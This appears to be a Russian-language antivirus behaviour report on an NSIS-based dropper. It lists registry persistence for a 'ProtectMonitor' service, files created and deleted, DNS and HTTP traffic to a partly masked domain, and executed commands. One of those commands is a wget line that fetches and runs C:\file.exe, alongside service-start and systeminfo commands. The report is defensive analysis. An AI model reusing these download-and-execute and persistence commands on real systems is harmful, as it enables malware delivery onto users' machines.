Техническая информация
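Модифицирует следующие ключи реестра (значение 'Start' = 2 соответствует автоматическому запуску службы при загрузке системы):
- [<HKLM>\SYSTEM\ControlSet001\Services\ProtectMonitor] 'Start' = '00000002'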
Запускает на исполнение:
- 'C:\wget.exe' -q -O "C:\file.exe" "http://so####re-cdn.net/deliver/intl/v4/file.exe"
- '%TEMP%\nsl2.tmp\ns6.tmp' C:\file.exe
- 'C:\file.exe'
- '%TEMP%\nsl2.tmp\ns3.tmp' sc start "PCProtect"
- '%TEMP%\nsl2.tmp\ns4.tmp' systeminfo
- '%TEMP%\nsl2.tmp\ns5.tmp' C:\wget.exe -q -O "C:\file.exe" "http://so####re-cdn.net/deliver/intl/v4/file.exe"
- 'C:\file.exe' (загружен из сети Интернет)
- '<SYSTEM32>\systeminfo.exe'
- '<SYSTEM32>\sc.exe' start "PCProtect"
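Создает следующие файлы (подзаголовок утрачен при извлечении и восстановлен по содержимому списка; nsExec.dll и SimpleSC.dll — плагины установщика NSIS, то есть дроппер, по-видимому, собран на NSIS):
- C:\wget.exe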
- %TEMP%\nsl2.tmp\ns4.tmp
- %TEMP%\nsl2.tmp\ns5.tmp
- %TEMP%\nsl2.tmp\ns6.tmp
- C:\file.exe
- %TEMP%\nsl2.tmp\ns3.tmp
- %TEMP%\nsl2.tmp\nsExec.dll
- C:\monitorsvc.exe
- %TEMP%\nsl2.tmp\SimpleSC.dll
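Удаляет следующие файлы (подзаголовок утрачен при извлечении; по-видимому, это повторный перечень временных файлов установщика, удаляемых после работы):
- %TEMP%\nsl2.tmp\ns6.tmp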
- %TEMP%\nsl2.tmp\nsExec.dll
- %TEMP%\nsl2.tmp\SimpleSC.dll
- %TEMP%\nsl2.tmp\ns3.tmp
- %TEMP%\nsl2.tmp\ns4.tmp
- %TEMP%\nsl2.tmp\ns5.tmp
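Сетевая активность — подключение, HTTP-запрос и DNS-запрос (часть имени домена в источнике замаскирована символами ####, поэтому как точный индикатор оно непригодно):
- 'so####re-cdn.net':80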
- so####re-cdn.net/deliver/intl/v4/file.exe
- DNS ASK so####re-cdn.net